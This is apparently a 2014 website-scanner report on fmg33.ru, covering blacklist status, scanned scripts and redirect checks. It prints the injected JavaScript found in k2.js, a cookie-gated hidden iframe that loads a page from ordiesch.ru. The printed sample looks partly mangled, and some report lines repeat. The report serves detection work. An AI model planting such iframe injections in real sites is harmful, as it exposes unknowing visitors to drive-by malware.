Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=fmg33.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://fmg33.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://fmg33.ru/ | 200 OK Content-Length: 71742 Content-Type: text/html | clean |
http://fmg33.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 47930 Content-Type: application/javascript | clean |
http://fmg33.ru/media/system/js/core.js | 200 OK Content-Length: 15 Content-Type: application/javascript | clean |
http://fmg33.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 12 Content-Type: application/javascript | clean |
http://fmg33.ru/media/system/js/modal.js | 200 OK Content-Length: 11 Content-Type: application/javascript | clean |
http://fmg33.ru/media/k2/assets/js/jquery-1.7.1.min.js | 200 OK Content-Length: 47804 Content-Type: application/javascript | clean |
http://fmg33.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 988 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); return matches ? decodeURIComponent(matches[1]) : undefined; } var cookie = getCookie('uca1872lat'); if (cookie == undefined) { setCookie('uca1872lat', true, 292200); document.write('<iframe style="position:absolute;left:-999px;top:-999px;" height="119" width="119" src="http://ordiesch.ru/comprehensive.html?2"></iframe>'); } })(); Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://fmg33.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 50 Content-Type: application/javascript | clean |
http://fmg33.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 16 Content-Type: application/javascript | clean |
http://fmg33.ru/media/com_acymailing/js/acymailing_module.js | 200 OK Content-Length: 10354 Content-Type: application/javascript | clean |
http://fmg33.ru/components/com_chronoforms/js/formcheck/formcheck-yui.js | 200 OK Content-Length: 1291 Content-Type: application/javascript | clean |
http://fmg33.ru/components/com_chronoforms/js/formcheck/formcheck-max.js | 200 OK Content-Length: 4097 Content-Type: application/javascript | clean |
http://fmg33.ru/components/com_chronoforms/js/formcheck/lang/ru.js | 200 OK Content-Length: 55 Content-Type: application/javascript | clean |
http://userapi.com/js/api/openapi.js?49 | 200 OK Content-Length: 64013 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: fmg33.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Wed, 17 Sep 2014 06:36:27 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Length: 71742
Content-Type: text/html;charset=utf-8
Expires: Fri, 19 Sep 2014 00:00:00 GMT
Last-Modified: Tue, 16 Sep 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.29
...71742 bytes of data.
GET / HTTP/1.1
Host: fmg33.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Connection: close
Date: Wed, 17 Sep 2014 06:36:27 GMT
Pragma: no-cache
Server: LiteSpeed
Content-Length: 71742
Content-Type: text/html;charset=utf-8
Expires: Fri, 19 Sep 2014 00:00:00 GMT
Last-Modified: Tue, 16 Sep 2014 00:00:00 GMT
X-Powered-By: PHP/5.3.29
...71742 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: fmg33.ru
Referer: http://www.google.com/search?q=fmg33.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: fmg33.ru
Referer: http://www.google.com/search?q=fmg33.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.